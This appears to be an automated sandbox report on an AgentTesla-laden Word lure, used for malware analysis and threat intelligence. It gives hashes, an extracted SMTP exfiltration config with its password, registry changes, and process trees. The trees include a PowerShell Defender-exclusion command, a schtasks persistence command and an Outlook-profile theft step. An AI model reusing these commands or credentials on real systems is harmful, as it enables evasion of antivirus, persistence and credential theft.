Analysis
-
max time kernel
101s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
02-03-2023 07:36
Static task
static1
Behavioral task
behavioral1
Sample
Order 84889-CVE2-52022.docx
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Order 84889-CVE2-52022.docx
Resource
win10v2004-20230220-en
General
-
Target
Order 84889-CVE2-52022.docx
-
Size
10KB
-
MD5
26898dc21c47a0c8ce44952f38be7558
-
SHA1
7ca47776ae520edbb07d58e90e8f8b0194ca4def
-
SHA256
0aa8fae7adcb3b01e64ff034585ab4f7dda57eef969732ca1f46a4645e25bf7e
-
SHA512
36564d02ffc9df006a818909ae1b0c0e4a38f325758b55dc1d61f519c70d41b4f2970338cf9cd87323adaf4df014e79e33886af9aaf36cb893ca8bcff590d883
-
SSDEEP
192:ScIMmtP1aIG/bslPL++uO+zl+CVWBXJC0c3ue:SPXU/slT+LO+zHkZC91
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.huiijingco.com - Port:
587 - Username:
m@huiijingco.com - Password:
lNLUrZT2 - Email To:
m@huiijingco.com
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 1 IoCs
Processes:
EQNEDT32.EXEflow pid process 7 1332 EQNEDT32.EXE -
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location 2 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Office\14.0\Common WINWORD.EXE Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Office\Common\Offline\Files\http://267199949/e2....................doc WINWORD.EXE -
Executes dropped EXE 1 IoCs
Processes:
vbc.exepid process 896 vbc.exe -
Loads dropped DLL 1 IoCs
Processes:
EQNEDT32.EXEpid process 1332 EQNEDT32.EXE -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
RegSvcs.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 api.ipify.org 10 api.ipify.org -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
vbc.exedescription pid process target process PID 896 set thread context of 1144 896 vbc.exe RegSvcs.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1668 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
vbc.exepowershell.exepid process 896 vbc.exe 896 vbc.exe 680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
vbc.exeRegSvcs.exepowershell.exeWINWORD.EXEdescription pid process Token: SeDebugPrivilege 896 vbc.exe Token: SeDebugPrivilege 1144 RegSvcs.exe Token: SeDebugPrivilege 680 powershell.exe Token: SeShutdownPrivilege 1668 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1668 WINWORD.EXE 1668 WINWORD.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
EQNEDT32.EXEWINWORD.EXEvbc.exedescription pid process target process PID 1332 wrote to memory of 896 1332 EQNEDT32.EXE vbc.exe PID 1332 wrote to memory of 896 1332 EQNEDT32.EXE vbc.exe PID 1332 wrote to memory of 896 1332 EQNEDT32.EXE vbc.exe PID 1332 wrote to memory of 896 1332 EQNEDT32.EXE vbc.exe PID 1668 wrote to memory of 468 1668 WINWORD.EXE splwow64.exe PID 1668 wrote to memory of 468 1668 WINWORD.EXE splwow64.exe PID 1668 wrote to memory of 468 1668 WINWORD.EXE splwow64.exe PID 1668 wrote to memory of 468 1668 WINWORD.EXE splwow64.exe PID 896 wrote to memory of 680 896 vbc.exe powershell.exe PID 896 wrote to memory of 680 896 vbc.exe powershell.exe PID 896 wrote to memory of 680 896 vbc.exe powershell.exe PID 896 wrote to memory of 680 896 vbc.exe powershell.exe PID 896 wrote to memory of 1880 896 vbc.exe schtasks.exe PID 896 wrote to memory of 1880 896 vbc.exe schtasks.exe PID 896 wrote to memory of 1880 896 vbc.exe schtasks.exe PID 896 wrote to memory of 1880 896 vbc.exe schtasks.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe PID 896 wrote to memory of 1144 896 vbc.exe RegSvcs.exe -
outlook_office_path 1 IoCs
Processes:
RegSvcs.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
Processes:
RegSvcs.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Order 84889-CVE2-52022.docx"1⤵
- Abuses OpenXML format to download file from external location
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\thHVOlYHyYRLoS.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\thHVOlYHyYRLoS" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1C29.tmp"3⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{85F3081F-3681-4532-BB08-F6A6723F069E}.FSDFilesize
128KB
MD5dd07c5881fc344707cb514d1a61c986a
SHA1f00bcabf5b3248f94d0456e84e2f516b7e313022
SHA256845a891e23e4ad58c96a83865f4adf4e2f20428fac96e7a033e3cc03547368c7
SHA512ef2f5fa2e23271230db9ccedc011d9035653b6ddff0b5fda22f33b10390abf1b5ab08fc2e675ac39fae07fcaaf04d50210c7ae11cb171252ae9f0c41d68b61d2
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDFilesize
128KB
MD5b494e82d27f6da9a68660a30f641feb3
SHA19bab14f4baccd32700d3b0b75c1ce0a13967d2f6
SHA2563741894c26d545806635edc187328e51948b28d4c552ae3d3e59fbd93f6e2aeb
SHA5121fd65dfacd79bea86089ff7fd81431581d945c2bfb3489d7e37e04a075f64566ce1dde92296ff77b021459a9f0277a52edf811d811bf01de59dce08b90cd2842
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{90D7D9CC-40B9-4DDA-A062-A5A7021FE5F8}.FSDFilesize
128KB
MD5dd48ae589f11d97e129cd2d0487010ac
SHA147b6678fc99816cdad417c48c7bcaad14a31de11
SHA2563975cd6b6a1c69d33f78f0ae5231efab51f99bd0ea09779950043afe8551813d
SHA512f38a061b50ee33f50d0cd7b92ae84779028bd4cb44e8c3af0b045a2d24d509f4ba78016a855ee15015edd18aa292a32b6bc3a10b1859f71808e33e09789428d5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S7FIT0B8\e2[1].docFilesize
14KB
MD5b13a74dca15cc4c5b3e73d60c4f100e3
SHA1a67404eb18267d09a5d54f2e7ea9e85097bdd3f5
SHA2565e41401cc62f4ff58c658edce9d1823e2f6f84a646c9aa1c7fbac7f091ebc614
SHA512ae9ee73aca3b515f7cfa4a7672809cf3da69bcc91d2676bf4a5666986ad1e4603148edbb588b10bb0c03b55fe0d31b1e348bb7006482bd252a58dfb12facb1e1
-
C:\Users\Admin\AppData\Local\Temp\tmp1C29.tmpFilesize
1KB
MD50bc3962d41075c400360f07c6a52e3aa
SHA115759f03f512172d9bb8b39ebc03eac0bac03826
SHA2567db9f4840b7dcf2b79b916c42efe2a0ff12a0b52347ec993d595ec2e0339b31f
SHA5120a0b241e098599578137d8157ac8d7217cfdd25d1645accf3a815c2d283efa9b9beeb507fa381ee4ebf1175bfd2ea23795d4dd44b02bc1c76de680bc9b11ea8d
-
C:\Users\Admin\AppData\Local\Temp\{D4C61040-7E1C-4331-A302-DD6190966C93}Filesize
128KB
MD5e8c2d73265fcd3d2245c8fcf7e4e4b22
SHA1a88750072b15d305a27143068240b3c7d2f20131
SHA2565424b925e7d89022bda4e4cfe82e99d8850fc7082d022c4810b0a2c59945d53e
SHA512ab84ae6b0c48ce6fe9d3e5af8e5c79131d7fed1f28900691b4b14fb6c083828abd16f93af0bcc08da3f42d71d16702ea75e40cd08abecc8ced74d64c14d04e50
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
20KB
MD5a2c431577be7e81f854aa11ae86b6d70
SHA190a776cd07cae92a138d2a24da43aea1ba98e61d
SHA256a6ef2c8847b1e48287ff84cb7cdb5158297dd147a3dedc1cdfc9660ce6c29107
SHA512f3b7ef9a9edfdf9ad2f04f947ce0dd701c2b6bb5d3e552370053e2159077ed66828b9e70d6a63ccbedec46fd58d734b2fda94073aa8c222edce586f8d2f2759c
-
C:\Users\Public\vbc.exeFilesize
976KB
MD56d481784ddebd32b6a604a897874f25c
SHA1928bba0214e7e44f12da24c6ae48d038b877abff
SHA2567cb205c2b341f4f78195275cc37cb07cf7b24a0f31f09639896bb97a4130e430
SHA5123f42c61ebc447a6c6decac361d4aa609d287607780f83eef56a277eeb34847f2c6dce58ee77d833cbea6388846ff52a01237ecd88da230dd1d7d947c666dc04c
-
C:\Users\Public\vbc.exeFilesize
976KB
MD56d481784ddebd32b6a604a897874f25c
SHA1928bba0214e7e44f12da24c6ae48d038b877abff
SHA2567cb205c2b341f4f78195275cc37cb07cf7b24a0f31f09639896bb97a4130e430
SHA5123f42c61ebc447a6c6decac361d4aa609d287607780f83eef56a277eeb34847f2c6dce58ee77d833cbea6388846ff52a01237ecd88da230dd1d7d947c666dc04c
-
C:\Users\Public\vbc.exeFilesize
976KB
MD56d481784ddebd32b6a604a897874f25c
SHA1928bba0214e7e44f12da24c6ae48d038b877abff
SHA2567cb205c2b341f4f78195275cc37cb07cf7b24a0f31f09639896bb97a4130e430
SHA5123f42c61ebc447a6c6decac361d4aa609d287607780f83eef56a277eeb34847f2c6dce58ee77d833cbea6388846ff52a01237ecd88da230dd1d7d947c666dc04c
-
\Users\Public\vbc.exeFilesize
976KB
MD56d481784ddebd32b6a604a897874f25c
SHA1928bba0214e7e44f12da24c6ae48d038b877abff
SHA2567cb205c2b341f4f78195275cc37cb07cf7b24a0f31f09639896bb97a4130e430
